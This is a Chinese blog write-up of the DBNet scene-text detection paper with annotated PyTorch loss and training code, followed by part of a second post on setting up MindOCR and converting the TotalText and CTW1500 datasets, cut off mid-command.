    3
    def step_function(self, x, y):
    return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
    # 这个 step_function 就是 Differentiable binarization 的公式

    webp

    DB 的 k 越大,越接近于 Standard Binarization

    ​DB 提高性能的原因可以通过梯度的反向传播来解释。以二元交叉熵损失为例。定义 $f(x)=\frac{1}{1+e^{-kx}}$ 作为我们的 DB 函数,其中 $x=P_{i,j}-T_{i,j}$。那么正标签的损失 $l_{+}$ 和负标签的损失 $l_{−}$ 分别为:

    $$l_{-}=-\log\left(1-\frac{1}{1+e^{-kx}}\right)$$

    ​我们可以很容易地用链式法则计算损失的微分:

    $$\begin{aligned}&\frac{\partial l_+}{\partial x}=-kf(x)e^{-kx}\&\frac{\partial l_-}{\partial x}=kf(x)\end{aligned}$$

    ​$l_{+}$ 和 $l_{−}$ 的微分中我们可以看出:

    1. 梯度被放大因子 $k$ 放大;
    2. 梯度的放大对于大多数错误预测的区域都是显著的(对于 $L_+$,$x < 0$;对于 $L_-$,$x > 0$),从而有利于优化,并有助于产生更独特的预测。此外,当 $x = P_{i,j} − T_{i,j}$ 时,$P$ 的梯度在前景和背景之间受到 $T$ 的影响和重新缩放。

    Adaptive threshold

    ​ 自适应阈值。

    Deformable convolution

    可变形卷积可以为模型提供灵活的感受野,这对极端长宽比的文本实例尤其有益。接下来,在 ResNet-18 或 ResNet-50 主干中的 conv3、conv4 和 conv5 阶段,在所有 3×3 卷积层中应用调制可变形卷积。

    Label generation

    webp

    Label generation。文本多边形的注释以红线显示。收缩和展开的多边形分别显示为蓝线和绿线

    ​ 概率图的标签生成受到 PSENet 的启发。给定一个文本图像,其文本区域的每个多边形由一组线段描述:

    $$G={S_k}^n_{k=1}$$

    ​ $n$ 是顶点的数量,在不同的数据集中可能不同,例如,ICDAR 2015 数据集为 4(Karatzas 等人),CTW1500 数据集为 16。

    ​ 通过使用 Vatti 剪裁算法将多边形 $G$ 缩小为 $G_s$ 来生成正区域。收缩的偏移量 $D$ 是根据原始多边形的周长 $L$ 和面积 $A$ 计算得出的:

    $$D=\frac{A(1-r^2)}{L}$$

    ​ 其中 $r$ 是收缩率,根据经验设置为 0.4。

    ​ 通过类似的过程,我们可以为阈值映射生成标签。首先,将文本多边形 $G$ 以与 $G_d$ 相同的偏移量 $D$ 展开。我们将 $G_s$ 和 $G_d$ 之间的间隙视为文本区域的边界,其中可以通过计算到 $G$ 中最近线段的距离来生成阈值图的标签。


    ​在 data_loader 中实现。

    • 根据人工标记的 gt 框(一系列坐标点),进行一些膨胀(dilate)和缩小(shrink)的操作
    • 做一些 gt 框内的计算来得到 probability_mapthreshold_map

    Optimization

    ​ 损失函数 $L$ 可以表示为概率映射 $L_s$ 的损失、二进制映射 $L_b$ 的损失和阈值映射 $L_t$ 的损失的加权和

    $$L=L_s+\alpha\times L_b+\beta\times L_t$$

    ​ $\alpha$ 和 $\beta$ 分别取 1.0 和 10。

    ​ 对 $L_s$ 和 $L_b$ 都应用了二进制交叉熵(BCE)损失:

    $$L_s=L_b=\Sigma_{i\in S_l}y_i\log x_i+(1-y_i)\log(1-x_i)$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    class BalanceCrossEntropyLoss(nn.Module):
    # 这个损失函数是交叉熵损失的一个平衡版本,用于处理类不平衡问题。它在计算损失时对正样本和负样本进行不同的加权,以便在训练时能更好地处理类别不平衡的情况。
    '''
    Balanced cross entropy loss.
    Shape:
    - Input: :math:`(N, 1, H, W)`
    - GT: :math:`(N, 1, H, W)`, same shape as the input
    - Mask: :math:`(N, H, W)`, same spatial shape as the input
    - Output: scalar.

    Examples::

    >>> m = nn.Sigmoid()
    >>> loss = nn.BCELoss()
    >>> input = torch.randn(3, requires_grad=True)
    >>> target = torch.empty(3).random_(2)
    >>> output = loss(m(input), target)
    >>> output.backward()
    '''

    def __init__(self, negative_ratio=3.0, eps=1e-6):
    # negative_ratio:一个负样本的比例,默认值为 3.0,表示负样本的数量是正样本数量的 3 倍。
    # eps: 一个小的常数(1e-6),用于避免除零错误。
    super(BalanceCrossEntropyLoss, self).__init__()
    self.negative_ratio = negative_ratio
    self.eps = eps

    def forward(self,
    pred: torch.Tensor, # pred: 网络的预测值,形状为 (N, 1, H, W)。
    gt: torch.Tensor, # 目标值,形状同 pred。
    mask: torch.Tensor, # 掩码,形状为 (N, H, W),用来指示正样本区域。
    return_origin=False):
    '''
    Args:
    pred: shape :math:`(N, 1, H, W)`, the prediction of network
    gt: shape :math:`(N, 1, H, W)`, the target
    mask: shape :math:`(N, H, W)`, the mask indicates positive regions
    '''
    # 计算正样本和负样本的数量,并使用负样本比例限制负样本的数量。
    positive = (gt * mask).byte()
    negative = ((1 - gt) * mask).byte()
    positive_count = int(positive.float().sum())
    negative_count = min(int(negative.float().sum()), int(positive_count * self.negative_ratio))
    loss = nn.functional.binary_cross_entropy(pred, gt, reduction='none')
    # 计算每个位置的二进制交叉熵损失。
    positive_loss = loss * positive.float()
    negative_loss = loss * negative.float()
    # negative_loss, _ = torch.topk(negative_loss.view(-1).contiguous(), negative_count)
    # 对正样本和负样本分别计算损失,然后将负样本的损失限制为一定的数量。
    negative_loss, _ = negative_loss.view(-1).topk(negative_count)

    # 最终计算加权的总损失并返回。
    balance_loss = (positive_loss.sum() + negative_loss.sum()) / (positive_count + negative_count + self.eps)

    if return_origin:
    return balance_loss, loss
    return balance_loss

    ​ $L_t$ 被计算为扩展文本多边形 $G_d$ 内的预测和标签之间的 $L_1$ 距离之和:

    $$L_t=\Sigma_{i\in R_d}|y*_i-x*_i|$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    class MaskL1Loss(nn.Module):
    # 这是一个基于 L1 损失的变体,结合了掩码,仅在感兴趣的区域计算损失。
    def __init__(self, eps=1e-6):
    super(MaskL1Loss, self).__init__()
    self.eps = eps

    def forward(self, pred: torch.Tensor, gt, mask):
    # 计算预测值和真实值之间的绝对差异,并根据掩码计算加权和。
    loss = (torch.abs(pred - gt) * mask).sum() / (mask.sum() + self.eps)
    return loss

    ​ 在推理阶段,我们可以使用概率图或近似二进制图来生成文本边界框,这会产生几乎相同的结果。

    $$D’=\frac{A’\times r’}{L’}$$

    ​ 其中 $A’$ 是收缩多边形的面积;$L’$ 是收缩多边形的周长;$r’$ 根据经验设定为 1.5。

    DB_loss.py

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    from torch import nn

    from models.losses.basic_loss import BalanceCrossEntropyLoss, MaskL1Loss, DiceLoss


    class DBLoss(nn.Module):
    def __init__(self, alpha=1.0, beta=10, ohem_ratio=3, reduction='mean', eps=1e-6):
    """
    Implement PSE Loss.
    :param alpha: binary_map loss 前面的系数
    :param beta: threshold_map loss 前面的系数
    :param ohem_ratio: OHEM 的比例
    :param reduction: 'mean' or 'sum'对 batch 里的 loss 算均值或求和
    """
    super().__init__()
    assert reduction in ['mean', 'sum'], " reduction must in ['mean','sum']"
    # alpha 和 beta 是控制不同损失项权重的系数。
    self.alpha = alpha
    self.beta = beta
    self.bce_loss = BalanceCrossEntropyLoss(negative_ratio=ohem_ratio)
    self.dice_loss = DiceLoss(eps=eps)
    self.l1_loss = MaskL1Loss(eps=eps)
    self.ohem_ratio = ohem_ratio # 用于 OHEM(在线困难样本挖掘)的比例。
    self.reduction = reduction # 指定了损失的归约方式(均值或总和)。

    def forward(self, pred, batch):
    shrink_maps = pred[:, 0, :, :]
    threshold_maps = pred[:, 1, :, :]
    binary_maps = pred[:, 2, :, :]

    loss_shrink_maps = self.bce_loss(shrink_maps, batch['shrink_map'], batch['shrink_mask']) # 对 shrink_maps 使用交叉熵损失(OHEM)。
    loss_threshold_maps = self.l1_loss(threshold_maps, batch['threshold_map'], batch['threshold_mask']) # 对 threshold_maps 使用 L1 损失。
    metrics = dict(loss_shrink_maps=loss_shrink_maps, loss_threshold_maps=loss_threshold_maps) # 如果 pred 包含多于两个通道,还计算 binary_maps 的 Dice 损失。
    if pred.size()[1] > 2:
    loss_binary_maps = self.dice_loss(binary_maps, batch['shrink_map'], batch['shrink_mask'])
    metrics['loss_binary_maps'] = loss_binary_maps
    loss_all = self.alpha * loss_shrink_maps + self.beta * loss_threshold_maps + loss_binary_maps # 汇总各个损失项,并根据是否包含 binary_maps 来调整总损失 (loss_all)。
    metrics['loss'] = loss_all # 返回一个包含各个损失项和总损失的字典 metrics。
    else:
    metrics['loss'] = loss_shrink_maps
    return metrics

    Experiments

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    from __future__ import print_function

    import argparse
    import os

    import anyconfig


    def init_args():
    parser = argparse.ArgumentParser(description='DBNet.pytorch')
    parser.add_argument('--config_file', default='config/open_dataset_resnet18_FPN_DBhead_polyLR.yaml', type=str)
    parser.add_argument('--local_rank', dest='local_rank', default=0, type=int, help='Use distributed training')

    args = parser.parse_args()
    return args


    def main(config):
    # 导入必要的模块,包括模型构建、损失函数、数据加载器、训练器、后处理和评估指标。
    import torch
    from models import build_model, build_loss
    from data_loader import get_dataloader
    from trainer import Trainer
    from post_processing import get_post_processing
    from utils import get_metric
    # 检查是否有多个 GPU,如果有,则初始化分布式训练环境。
    if torch.cuda.device_count() > 1:
    torch.cuda.set_device(args.local_rank)
    torch.distributed.init_process_group(backend="nccl", init_method="env://", world_size=torch.cuda.device_count(), rank=args.local_rank)
    config['distributed'] = True
    else:
    config['distributed'] = False
    config['local_rank'] = args.local_rank

    # 根据配置文件加载训练和验证数据加载器。
    train_loader = get_dataloader(config['dataset']['train'], config['distributed'])
    assert train_loader is not None
    if 'validate' in config['dataset']:
    validate_loader = get_dataloader(config['dataset']['validate'], False)
    else:
    validate_loader = None

    # 构建损失函数并将其移动到 GPU。
    criterion = build_loss(config['loss']).cuda()

    # 配置模型的输入通道数(彩色图像为 3 通道,灰度图像为 1 通道)。
    config['arch']['backbone']['in_channels'] = 3 if config['dataset']['train']['dataset']['args']['img_mode'] != 'GRAY' else 1
    model = build_model(config['arch'])

    # 构建模型、后处理函数和评估指标。
    post_p = get_post_processing(config['post_processing'])
    metric = get_metric(config['metric'])

    # 创建 Trainer 对象并开始训练。
    trainer = Trainer(config=config,
    model=model,
    criterion=criterion,
    train_loader=train_loader,
    post_process=post_p,
    metric_cls=metric,
    validate_loader=validate_loader)
    trainer.train()


    if __name__ == '__main__':
    # 处理模块路径,确保当前目录和上级目录在 Python 路径中。
    import sys
    import pathlib
    __dir__ = pathlib.Path(os.path.abspath(__file__))
    sys.path.append(str(__dir__))
    sys.path.append(str(__dir__.parent.parent))
    # project = 'DBNet.pytorch' # 工作项目根目录
    # sys.path.append(os.getcwd().split(project)[0] + project)

    # 使用 anyconfig 读取配置文件,并解析基础配置。
    from utils import parse_config

    args = init_args()
    assert os.path.exists(args.config_file)
    config = anyconfig.load(open(args.config_file, 'rb'))
    if 'base' in config:
    config = parse_config(config)
    # 调用 main 函数开始模型训练。
    main(config)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    import time

    import torch
    import torchvision.utils as vutils
    from tqdm import tqdm

    from base import BaseTrainer
    from utils import WarmupPolyLR, runningScore, cal_text_score


    class Trainer(BaseTrainer):
    # 初始化:__init__ 方法接受多个参数,包括配置 (config)、模型 (model)、损失函数 (criterion)、训练和验证数据加载器 (train_loader 和 validate_loader)、评估指标类 (metric_cls)、以及可选的后处理函数 (post_process)。
    def __init__(self, config, model, criterion, train_loader, validate_loader, metric_cls, post_process=None):
    super(Trainer, self).__init__(config, model, criterion)
    # 参数设置:从配置中读取训练迭代次数 (show_images_iter),并初始化训练和验证数据加载器。若验证数据加载器存在,确保提供了后处理函数和评估指标类。
    self.show_images_iter = self.config['trainer']['show_images_iter']
    self.train_loader = train_loader
    if validate_loader is not None:
    assert post_process is not None and metric_cls is not None
    self.validate_loader = validate_loader
    self.post_process = post_process
    self.metric_cls = metric_cls
    self.train_loader_len = len(train_loader)
    # 学习率调度器:根据配置,设置学习率调度器 WarmupPolyLR,用于调整学习率。它支持学习率的预热和多项式衰减。
    if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
    warmup_iters = config['lr_scheduler']['args']['warmup_epoch'] * self.train_loader_len
    if self.start_epoch > 1:
    self.config['lr_scheduler']['args']['last_epoch'] = (self.start_epoch - 1) * self.train_loader_len
    self.scheduler = WarmupPolyLR(self.optimizer, max_iters=self.epochs * self.train_loader_len,
    warmup_iters=warmup_iters, **config['lr_scheduler']['args'])
    # 日志记录:记录训练和验证数据集的样本数量和数据加载器的数量。
    if self.validate_loader is not None:
    self.logger_info(
    'train dataset has {} samples,{} in dataloader, validate dataset has {} samples,{} in dataloader'.format(
    len(self.train_loader.dataset), self.train_loader_len, len(self.validate_loader.dataset), len(self.validate_loader)))
    else:
    self.logger_info('train dataset has {} samples,{} in dataloader'.format(len(self.train_loader.dataset), self.train_loader_len))

    # 这段代码定义了 _train_epoch 方法,用于训练模型一个训练周期(epoch)。
    def _train_epoch(self, epoch):
    # 模型训练模式:调用 self.model.train() 设置模型为训练模式。
    self.model.train()
    # 时间记录:记录周期和批次的开始时间。
    epoch_start = time.time()
    batch_start = time.time()
    train_loss = 0.
    running_metric_text = runningScore(2)
    # 初始化:初始化累计损失 train_loss 和运行中的指标 running_metric_text,并获取当前学习率 lr。
    lr = self.optimizer.param_groups[0]['lr']

    # 遍历数据:遍历训练数据加载器中的每个批次:
    for i, batch in enumerate(self.train_loader):
    if i >= self.train_loader_len:
    break
    self.global_step += 1
    lr = self.optimizer.param_groups[0]['lr']

    # 数据进行转换和丢到 gpu
    # 将数据移动到 GPU 上。
    for key, value in batch.items():
    if value is not None:
    if isinstance(value, torch.Tensor):
    batch[key] = value.to(self.device)
    cur_batch_size = batch['img'].size()[0]

    # 通过模型生成预测 preds。
    preds = self.model(batch['img'])
    # 计算损失 loss_dict,并执行反向传播和优化步骤。
    loss_dict = self.criterion(preds, batch)
    # backward
    self.optimizer.zero_grad()
    loss_dict['loss'].backward()
    self.optimizer.step()
    # 如果使用了 WarmupPolyLR,更新学习率调度器。
    if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
    self.scheduler.step()
    # acc iou
    # 计算指标 score_shrink_map,并记录损失和准确度信息。
    score_shrink_map = cal_text_score(preds[:, 0, :, :], batch['shrink_map'], batch['shrink_mask'], running_metric_text,
    thred=self.config['post_processing']['args']['thresh'])

    # loss 和 acc 记录到日志
    # 日志记录:将损失和各个指标记录为字符串 loss_str,并累加到总训练损失 train_loss。
    loss_str = 'loss: {:.4f}, '.format(loss_dict['loss'].item())
    for idx, (key, value) in enumerate(loss_dict.items()):
    loss_dict[key] = value.item()
    if key == 'loss':
    continue
    loss_str += '{}: {:.4f}'.format(key, loss_dict[key])
    if idx < len(loss_dict) - 1:
    loss_str += ', '

    train_loss += loss_dict['loss']
    acc = score_shrink_map['Mean Acc']
    iou_shrink_map = score_shrink_map['Mean IoU']

    # 条件:每隔 log_iter 步记录一次日志。
    # 指标:计算每秒处理样本的速度,并记录准确率、IoU、损失和学习率。
    # 日志记录:使用 self.logger_info 输出这些指标,以便监控训练过程。
    if self.global_step % self.log_iter == 0:
    batch_time = time.time() - batch_start
    self.logger_info(
    '[{}/{}], [{}/{}], global_step: {}, speed: {:.1f} samples/sec, acc: {:.4f}, iou_shrink_map: {:.4f}, {}, lr:{:.6}, time:{:.2f}'.format(
    epoch, self.epochs, i + 1, self.train_loader_len, self.global_step, self.log_iter * cur_batch_size / batch_time, acc,
    iou_shrink_map, loss_str, lr, batch_time))
    batch_start = time.time()

    # 条件:如果启用了 TensorBoard,则写入日志。
    # 损失和指标:将各种训练指标和损失记录到 TensorBoard 中以便可视化。
    if self.tensorboard_enable and self.config['local_rank'] == 0:
    # write tensorboard
    for key, value in loss_dict.items():
    self.writer.add_scalar('TRAIN/LOSS/{}'.format(key), value, self.global_step)
    self.writer.add_scalar('TRAIN/ACC_IOU/acc', acc, self.global_step)
    self.writer.add_scalar('TRAIN/ACC_IOU/iou_shrink_map', iou_shrink_map, self.global_step)
    self.writer.add_scalar('TRAIN/lr', lr, self.global_step)
    # 图像可视化:条件:每隔 show_images_iter 步可视化一次图像。
    # 图像和标签:将原始图像、真实标签和模型预测结果添加到 TensorBoard 中。
    # 可视化:使用 vutils.make_grid 创建图像网格以便更好地可视化。
    if self.global_step % self.show_images_iter == 0:
    # show images on tensorboard
    self.inverse_normalize(batch['img'])
    self.writer.add_images('TRAIN/imgs', batch['img'], self.global_step)
    # shrink_labels and threshold_labels
    shrink_labels = batch['shrink_map']
    threshold_labels = batch['threshold_map']
    shrink_labels[shrink_labels <= 0.5] = 0
    shrink_labels[shrink_labels > 0.5] = 1
    show_label = torch.cat([shrink_labels, threshold_labels])
    show_label = vutils.make_grid(show_label.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
    self.writer.add_image('TRAIN/gt', show_label, self.global_step)
    # model output
    show_pred = []
    for kk in range(preds.shape[1]):
    show_pred.append(preds[:, kk, :, :])
    show_pred = torch.cat(show_pred)
    show_pred = vutils.make_grid(show_pred.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
    self.writer.add_image('TRAIN/preds', show_pred, self.global_step)
    # 总结:返回一个包含每个 epoch 的平均训练损失、学习率、总时间和 epoch 编号的字典。
    return {'train_loss': train_loss / self.train_loader_len, 'lr': lr, 'time': time.time() - epoch_start,
    'epoch': epoch}

    def _eval(self, epoch):
    # 这将影响模型的行为,比如在评估时关闭 dropout 和 batch normalization。
    self.model.eval()
    # torch.cuda.empty_cache() # speed up evaluating after training finished
    # raw_metrics 用来存储每个批次的评估指标,total_frame 用来记录总的处理帧数,total_time 记录总的处理时间。
    raw_metrics = []
    total_frame = 0.0
    total_time = 0.0
    for i, batch in tqdm(enumerate(self.validate_loader), total=len(self.validate_loader), desc='test model'):
    # 关闭梯度计算:这用于避免计算梯度,从而减少内存使用和加快计算速度。
    with torch.no_grad():
    # 数据进行转换和丢到gpu
    for key, value in batch.items():
    if value is not None:
    if isinstance(value, torch.Tensor):
    batch[key] = value.to(self.device)
    # 记录开始时间并进行预测:
    start = time.time()
    preds = self.model(batch['img'])
    # 对预测结果进行后处理:
    boxes, scores = self.post_process(batch, preds,is_output_polygon=self.metric_cls.is_output_polygon)
    # 更新统计数据:
    total_frame += batch['img'].size()[0]
    total_time += time.time() - start
    # 计算并记录评估指标:
    raw_metric = self.metric_cls.validate_measure(batch, (boxes, scores))
    raw_metrics.append(raw_metric)
    # 汇总指标:
    metrics = self.metric_cls.gather_measure(raw_metrics)
    # 记录每秒帧数(FPS):
    self.logger_info('FPS:{}'.format(total_frame / total_time))
    # 返回指标:
    return metrics['recall'].avg, metrics['precision'].avg, metrics['fmeasure'].avg

    def _on_epoch_finish(self):
    # 这个方法在每个训练周期结束时执行,执行以下操作:
    # 记录当前训练周期的信息:
    self.logger_info('[{}/{}], train_loss: {:.4f}, time: {:.4f}, lr: {}'.format(
    self.epoch_result['epoch'], self.epochs, self.epoch_result['train_loss'], self.epoch_result['time'],
    self.epoch_result['lr']))
    # 保存模型检查点:
    net_save_path = '{}/model_latest.pth'.format(self.checkpoint_dir)
    net_save_path_best = '{}/model_best.pth'.format(self.checkpoint_dir)

    # 如果是主进程:
    if self.config['local_rank'] == 0:
    # 保存当前模型检查点:
    self._save_checkpoint(self.epoch_result['epoch'], net_save_path)
    save_best = False
    if self.validate_loader is not None and self.metric_cls is not None: # 使用 f1 作为最优模型指标
    # 评估模型性能(如果有验证集和指标类):
    recall, precision, hmean = self._eval(self.epoch_result['epoch'])

    # 记录评估指标到 TensorBoard(如果启用):
    if self.tensorboard_enable:
    self.writer.add_scalar('EVAL/recall', recall, self.global_step)
    self.writer.add_scalar('EVAL/precision', precision, self.global_step)
    self.writer.add_scalar('EVAL/hmean', hmean, self.global_step)
    self.logger_info('test: recall: {:.6f}, precision: {:.6f}, f1: {:.6f}'.format(recall, precision, hmean))

    # 根据 F1 分数或训练损失判断是否保存最佳模型:
    if hmean >= self.metrics['hmean']:
    save_best = True
    self.metrics['train_loss'] = self.epoch_result['train_loss']
    self.metrics['hmean'] = hmean
    self.metrics['precision'] = precision
    self.metrics['recall'] = recall
    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
    else:
    if self.epoch_result['train_loss'] <= self.metrics['train_loss']:
    save_best = True
    self.metrics['train_loss'] = self.epoch_result['train_loss']
    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
    # 记录最佳模型的信息并保存最佳模型:
    best_str = 'current best, '
    for k, v in self.metrics.items():
    best_str += '{}: {:.6f}, '.format(k, v)
    self.logger_info(best_str)
    if save_best:
    import shutil
    shutil.copy(net_save_path, net_save_path_best)
    self.logger_info("Saving current best: {}".format(net_save_path_best))
    else:
    self.logger_info("Saving checkpoint: {}".format(net_save_path))


    def _on_train_finish(self):
    # 这个方法在训练完成时执行,执行以下操作:
    # 记录所有指标信息:
    for k, v in self.metrics.items():
    self.logger_info('{}:{}'.format(k, v))
    # 记录训练完成的信息:
    self.logger_info('finish train')

    SynthText 是一个由 800k 张图像组成的合成数据集。这些图像是从 8k 个背景图像合成的。此数据集仅用于预训练我们的模型。

    ​ 训练数据的数据扩充包括:

    1. 角度范围为 $(-10{\circ},10{\circ})$ 的随机旋转
    2. 随机裁剪
    3. 随机翻转
    4. 为了提高训练效率,所有处理后的图像都被重新调整为 $640\times 640$

    • 使用 SynthText 数据集对它们进行 100k 次迭代的预训练
    • 1200 个 epoch 的相应真实世界数据集上微调模型。
      • 训练批次大小设置为 16。我们遵循多学习率策略,当前迭代的学习率等于初始学习率乘以 $(1-\frac{iter}{max_iter})^{power}$
        • 初始学习率设置为 0.007,$power$ 为 0.9
        • 使用 0.0001 的权重衰减和 0.9 的动量

    Ablation study

    ​ 证明各个模块都能提高性能。

    Comparisons with previous methods

    ​ P、R、F 三个指标都最佳。

    • TP: true positive。实际为正,预测为正。
    • FP: false positive。实际为负,预测为正。
    • TN: true negative。实际为负,预测为负。
    • FN: false negative。实际为正,预测为负。

    $$P=\frac{TP}{TP+FP}$$

    $$R=\frac{TP}{TP+FN}$$

    $$F=\frac{2PR}{P+R}$$


    在 TotalText 下的训练结果:

    MethodPRF
    DB-ResNet-18 (800)88.377.982.8
    DB-ResNet-50 (800)87.182.584.7

    在 CTW1500 下的训练结果:

    MethodPRF
    Ours-ResNet18 (1024)84.877.581.0
    Ours-ResNet50 (1024)86.980.283.4

    Limitation

    ​ 我们的方法的一个局限性是它不能处理 “文本中的文本” 的情况,这意味着一个文本实例在另一个文本例子中。尽管收缩的文本区域在文本实例不在另一个文本实例的中心区域的情况下很有帮助,但当文本实例正好位于另一个文字实例的中心区时,它会失败。这是基于分割的场景文本检测器的常见限制。

    Conclusion

    ​ 好使。

    ]]>
    @@ -5840,7 +5840,7 @@ /posts/Server-MindOCR/ - 资源

    开跑

    获取代码

    ​ 电脑下从 mindocr: MindOCR is an open-source toolbox for OCR development and application based on MindSpore. It helps users to train and apply the best text detection and recognition models, such as DBNet/DBNet++ and CR (gitee.com) 下载得到 mindocr-main.zip,拷贝到服务器的 work/ 下。

    ​ 解压。

    unzip mindocr-main.zip

    ​ 将会解压得到 mindocr-main 文件夹,将其改名为 mindocr

    创建环境

    ​ 从智算中心里整一个 mindspore:2.0.2-alpha 的镜像,打开它。

    ​ 创建虚拟环境:

    source activate base
    conda create -n mindocr --clone base
    conda activate mindocr

    ​ 检查 MindSpore 是否可用:

    python -c "import mindspore;mindspore.run_check()"
    MindSpore version:  2.0.0a0
    The result of multiplication calculation is correct, MindSpore has been installed successfully!

    安装环境

    ​ 由于 lanms 安装方式有点坑,先装好:

    pip install lanms-neo

    ​ 在 requirements.txt 里把 lanms 这行删了。

    work/ 目录下:

    cd mindocr
    pip install -e .
    Successfully built mindocr
    Installing collected packages: pyclipper, lmdb, xml-python, shapely, rapidfuzz, opencv-python-headless, mindocr
    Successfully installed lmdb-1.4.1mindocr-0.2.0 opencv-python-headless-4.8.0.74 pyclipper-1.3.0.post4 rapidfuzz-3.1.1shapely-2.0.1 xml-python-0.4.3

    转换数据集

    TotalText

    ​ Windows 下,分别从 图像 (size = 441Mb) 和 标注文件 (.txt 格式) 下载 totaltext.ziptxt_format.zip

    ​ 解压这两个压缩包,将里面的文件组织成如下形式:

    totaltext
    ├── Images
    │ ├── Train
    │ │ ├── img11.jpg
    │ │ ├── img12.jpg
    │ │ ├── ...(1255 个文件)
    │ ├── Test
    │ │ ├── img1.jpg
    │ │ ├── img2.jpg
    │ │ ├── ...(300 个文件)
    ├── Txts
    │ ├── Train
    │ │ ├── poly_gt_img11.txt
    │ │ ├── poly_gt_img12.txt
    │ │ ├── ...(1255 个文件)
    │ ├── Test
    │ │ ├── poly_gt_img1.txt
    │ │ ├── poly_gt_img2.txt
    │ │ ├── ...(300 个文件)

    ​ 然后再打成压缩包 totaltext.zip,上传到服务器,解压至(unzip 命令)相应目录data/ocr_datasets/下:

    png

    ​ 返回 mindocr/ 目录,开始转换数据集:

    • Train
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/totaltext/Images/Train/ \
    --label_dir ./data/ocr_datasets/totaltext/Txts/Train/ \
    --output_path ./data/ocr_datasets/totaltext/train_det_gt.txt
    Warning img1075.jpg: skipping invalid polygon [[221, 208]]
    Warning img1083.jpg: skipping invalid polygon [[534, 294]]
    Warning img114.jpg: skipping invalid polygon [[606, 697]]
    Warning img1304.jpg: skipping invalid polygon [[718, 303]]
    Warning img1474.jpg: skipping invalid polygon [[413, 792]]
    Warning img1489.jpg: skipping invalid polygon [[472, 1035]]
    Warning img700.jpg: skipping invalid polygon [[802, 1175]]
    Warning img759.jpg: skipping invalid polygon [[5, 984]]
    Warning img839.jpg: skipping invalid polygon [[491, 1052]]
    Warning img949.jpg: skipping invalid polygon [[947, 324]]
    Conversion complete.
    Result saved in ./data/ocr_datasets/totaltext/train_det_gt.txt
    • Test
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/totaltext/Images/Test \
    --label_dir ./data/ocr_datasets/totaltext/Txts/Test \
    --output_path ./data/ocr_datasets/totaltext/test_det_gt.txt
    Warning img664.jpg: skipping invalid polygon [[5, 340]]
    Conversion complete.
    Result saved in ./data/ocr_datasets/totaltext/test_det_gt.txt

    ​ 这样就可得到预期格式的数据集:

    totaltext
    ├── Images
    │ ├── Train
    │ │ ├── img1001.jpg
    │ │ ├── img1002.jpg
    │ │ ├── ...
    │ ├── Test
    │ │ ├── img1.jpg
    │ │ ├── img2.jpg
    │ │ ├── ...
    ├── test_det_gt.txt
    ├── train_det_gt.txt

    CTW1500

    ​ 从 Yuliang-Liu/Curve-Text-Detector: This repository provides train&test code, dataset, det.&rec. annotation, evaluation script, annotation tool, and ranking. (github.com) 下载压缩包并解压成如下形式:

    png

    ctw1500
    ├── ctw1500_train_labels
    │ ├── 0001.xml
    │ ├── 0002.xml
    │ ├── ...
    ├── gt_ctw_1500
    │ ├── 0001001.txt
    │ ├── 0001002.txt
    │ ├── ...
    ├── test_images
    │ ├── 1001.jpg
    │ ├── 1002.jpg
    │ ├── ...
    ├── train_images
    │ ├── 0001.jpg
    │ ├── 0002.jpg
    │ ├── ...

    ​ 将文件夹 ctw1500 重新打包成 ctw1500.zip,放到服务器中,解压出来:

    png

    mindocr/ 下执行转换命令:

    • Train
    python tools/dataset_converters/convert.py \
    --dataset_name ctw1500 \
    --task det \
